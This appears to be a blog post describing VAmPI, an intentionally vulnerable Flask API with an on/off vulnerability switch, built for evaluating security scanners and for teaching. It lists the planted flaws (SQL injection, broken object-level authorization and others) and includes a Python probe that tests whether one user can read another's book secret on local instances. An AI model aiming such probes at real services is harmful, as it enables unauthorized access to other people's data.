Monday, June 20, 2022

Vulnerable REST API With OWASP Top 10 Vulnerabilities For Security Testing




The Vulnerable API (Based on OpenAPI 3)

VAmPI is a vulnerable API made with Flask, and it includes vulnerabilities from the OWASP Top 10 vulnerabilities for APIs. It was created as I wanted a vulnerable API to evaluate the efficiency of tools used to detect security issues in APIs. It includes an on/off switch to allow the API to be vulnerable or not while testing. This makes it easier to cover the cases of false positives/negatives: a finding reported against the non-vulnerable instance is a false positive, and a known vulnerability missed on the vulnerable instance is a false negative. VAmPI can also be used for learning/teaching purposes. You can find a bit more details about the vulnerabilities in erev0s.com.

Features

  • Based on OWASP Top 10 vulnerabilities for APIs.
  • OpenAPI3 specs and Postman Collection included.
  • Global on/off switch to have a vulnerable environment or not.
  • Token-Based Authentication (adjust the token lifetime from within app.py)

VAmPI's flow of actions goes like this: an unregistered user can see minimal information about the dummy users included in the API. A user can register and then log in; the token received during login allows the user to post a book. For a posted book the data accepted are the title and a secret about that book. Each book is unique for every user, and only the owner of the book should be allowed to view the secret.

A quick rundown of the actions included can be seen in the following table:

Action   Path                            Details
GET      /createdb                       Creates and populates the database with dummy data
GET      /                               VAmPI home
GET      /users/v1                       Displays all users with basic information
GET      /users/v1/_debug                Displays all details for all users
POST     /users/v1/register              Register new user
POST     /users/v1/login                 Login to VAmPI
GET      /users/v1/{username}            Displays user by username
DELETE   /users/v1/{username}            Deletes user by username (Only Admins)
PUT      /users/v1/{username}/email      Update a single user's email
PUT      /users/v1/{username}/password   Update a user's password
GET      /books/v1                       Retrieves all books
POST     /books/v1                       Add new book
GET      /books/v1/{book}                Retrieves book by title along with its secret

For more details you can use a service like the Swagger editor, supplying it the OpenAPI specification which can be found in the directory openapi_specs.

List of Vulnerabilities

  • SQL Injection
  • Unauthorized Password Change
  • Broken Object Level Authorization
  • Mass Assignment
  • Excessive Data Exposure through the debug endpoint
  • User and Password Enumeration
  • RegexDOS (Denial of Service)
  • Lack of Resources & Rate Limiting

Run it

It's a Flask application, so in order to run it you can install all requirements and then run app.py. To install all requirements simply run pip3 install -r requirements.txt and then python3 app.py.

Or, if you prefer, you can also run it through Docker or Docker Compose.

Run it through Docker

Build with

docker build -t vampi_docker:latest .

and run (remove the -d if you want to see the output in your terminal)

docker run -d -p 5000:5000 vampi_docker:newest

[Note: if you run Docker on newer versions of macOS, use -p 5001:5000 to avoid conflicting with the AirPlay Receiver service, which listens on port 5000. Alternatively, you could disable the AirPlay Receiver service in your System Preferences -> Sharing settings.]

Run it through Docker Compose

Assuming you have built the container per the above steps, the Compose setup runs one instance securely (port 5001) and another insecurely (port 5002), so a scanner can be pointed at both and its findings compared.

Customizing the token timeout and the vulnerable environment or not

If you would like to change the timeout of the token created after login, or if you want to change the environment not to be vulnerable, there are a few ways depending on how you run the application.

  • If you run it normally with python3 app.py, then all you have to do is edit the alive and vuln variables defined in app.py itself. The alive variable is measured in seconds, so if you set it to 100, the token expires 100 seconds after login. The vuln variable acts as a boolean: if you set it to 1 the application is vulnerable, and if you set it to 0 the application is not vulnerable.
  • If you run it through Docker, then you need to either pass environment variables to the docker run command or edit the Dockerfile and rebuild.
    • Docker run example (the image tag must match the one used in docker build above): docker run -d -e vulnerable=0 -e tokentimetolive=300 -p 5000:5000 vampi_docker:latest

      • One nice feature of running it this way is that you can start up a second container with vulnerable=1 on a different port and flip easily between the two.
    • In the Dockerfile you can find two environment variables being set, ENV vulnerable=1 and ENV tokentimetolive=60. Feel free to change them before running the docker build command.
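The flow described earlier (register, log in, post a book, read it back) together with the two-container setup is enough to build a small probe for the Broken Object Level Authorization entry in the vulnerability list. The script below is an added example and is not code from the VAmPI project: it registers two users, lets the first post a book, and then asks for that book with the second user's token; the secret must not come back on the non-vulnerable instance. The JSON field names (username, password, email, book_title, secret), the auth_token key in the login response and the Bearer authorization header are assumptions, not stated on this page; check them against the spec in openapi_specs before relying on the result. The default base URLs assume the secure and vulnerable containers on ports 5001 and 5002 as in the Compose section.

```python
"""Added example (not part of VAmPI): probe GET /books/v1/{book} for Broken
Object Level Authorization against a secure and a vulnerable instance."""
import json
import sys
import urllib.error
import urllib.request


def http_send(method, url, body=None, token=None):
    """Default transport over urllib. Returns (status_code, parsed JSON or None)."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method=method)
    req.add_header("Content-Type", "application/json")
    if token:
        # ASSUMPTION: VAmPI reads the login token from a Bearer authorization header.
        req.add_header("Authorization", f"Bearer {token}")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            raw = resp.read()
            return resp.status, (json.loads(raw) if raw else None)
    except urllib.error.HTTPError as err:
        raw = err.read()
        try:
            return err.code, (json.loads(raw) if raw else None)
        except ValueError:
            return err.code, None


def register_and_login(base, user, send):
    """Register a user (a failure because the user already exists is ignored)
    and return the token issued by /users/v1/login."""
    # ASSUMPTION: request field names and the auth_token response key.
    password = "pw-" + user
    send("POST", f"{base}/users/v1/register",
         {"username": user, "password": password, "email": f"{user}@example.test"})
    status, body = send("POST", f"{base}/users/v1/login",
                        {"username": user, "password": password})
    if status != 200 or not isinstance(body, dict) or "auth_token" not in body:
        raise RuntimeError(f"login failed for {user}: {status} {body}")
    return body["auth_token"]


def bola_check(base, send=http_send):
    """Return True if a non-owner can read another user's book secret."""
    title = "bola-probe-book"          # no spaces, so it needs no URL encoding
    secret = "owner-only-secret"
    owner_token = register_and_login(base, "bola_owner", send)
    other_token = register_and_login(base, "bola_other", send)
    # ASSUMPTION: POST /books/v1 body keys; the page only says title and secret are accepted.
    send("POST", f"{base}/books/v1", {"book_title": title, "secret": secret}, token=owner_token)
    status, body = send("GET", f"{base}/books/v1/{title}", token=other_token)
    return status == 200 and isinstance(body, dict) and body.get("secret") == secret


def compare_instances(secure_base, vulnerable_base, send=http_send):
    """Run the probe against both instances. A correct scanner should flag only
    the vulnerable one; the secure result is the false-positive control."""
    return {
        "secure_leaks": bola_check(secure_base, send),
        "vulnerable_leaks": bola_check(vulnerable_base, send),
    }


if __name__ == "__main__":
    secure = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:5001"
    vulnerable = sys.argv[2] if len(sys.argv) > 2 else "http://localhost:5002"
    print(json.dumps(compare_instances(secure, vulnerable), indent=2))
```

The transport is injected through the send parameter so the same probe can be exercised against a fake API in a unit test; against a live instance, run python3 bola_probe.py http://localhost:5001 http://localhost:5002 after docker-compose has started both containers, and expect secure_leaks false and vulnerable_leaks true.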
